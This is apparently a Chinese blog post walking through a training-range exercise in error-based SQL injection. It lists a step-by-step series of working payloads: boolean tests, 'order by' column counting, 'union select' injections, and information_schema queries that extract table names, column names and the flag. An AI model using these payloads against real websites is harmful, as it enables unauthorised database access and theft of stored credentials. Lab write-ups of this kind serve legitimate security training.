2021-08-24

最新推荐文章于 2024-09-17 14:03:04 发布

第四季第七集

最新推荐文章于 2024-09-17 14:03:04 发布

阅读量1.9k

点赞数

分类专栏： Web渗透文章标签：系统安全 web安全安全

本文链接：https://blog.csdn.net/qq_45342243/article/details/119886310

版权

Web渗透专栏收录该内容

3 篇文章 0 订阅

订阅专栏

SQL注入（2）---- 显错注入

==================================================

注入的基本流程

判断是否存在SQL注入→判断字段数→判断显错位→判断库名→判断表名→判断列(字段)名→寻找详细信息。

以https://hack.zkaq.cn/中某靶场为例：
进靶场此时URL栏为：http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1
没有添加代码的初始页面 1>测试是否存在SQL注入
向任务栏中添加代码：
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1and1=1
页面无反应。
判断是否存在注入1 向任务栏中添加代码：
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1and1=2
页面显示异常。
判断是否存在注入2 2>判断字段数
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1 order by 1
显示页面正常。
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1 order by 2
显示页面正常。
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1 order by 3
显示页面正常。
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1 order by 4
显示页面异常。
所以可以得出有3个字段。

3>判断显错位
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1 union select 1,2,3
如图所示画面
可以判断出有两个回显点（显错位)为2、3位，1位为补充为继续下一步测试。

4>判断库名
http://inject2.lab.aqlab.cn/Pass-01/index.php?id=1%20union%20select%201,database(),3
得出如图所示页面
判断库的名称

5>判断表名
union select 1, 2,table_name from information_schema.tables where table_schema = database()
(将语句放在2处测试出现异常页面，在3处测试正常。)
得出如图所示页面
判断出表名为user

6>判断字段名
从上一步中得到了表名为user，进行下一步测试
and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘user’ limit 0,1
得出如图所示页面
判断表中字段通过改变limit0/1/2,1得出user表中有id、username、password三个字段
没有flag字段，所以寻找其他表。

如何得出其他的表
在查询表名语句后面加 limit 0,1 从第一条数据开始输出，输出一条结果
通过改变limit0/1/2/3…，1直到出现异常页面，获取所有的表名。
该库所有的表名分别为：【error_flag】【user】
如何得出所有的表名
union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) 显示全部的表名查询error_flag表中的字段

and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 0,1
查询另一表的字段1 and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 1,1
找到了flag字段
查询另一张表字段2
and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 2,1
显示异常页面故这张表只有【id】、【flag】两个字段

7>寻找详细信息
得知了库名、表名、字段名以及他们的位置关系通过下列语句可得出flag
and 1=2 union select 1,2,flag from error_flag limit 0,1
flag 得出所有flag(中的数据)
and 1=2 union select 1,2,(select group_concat(flag) from error_flag)
flag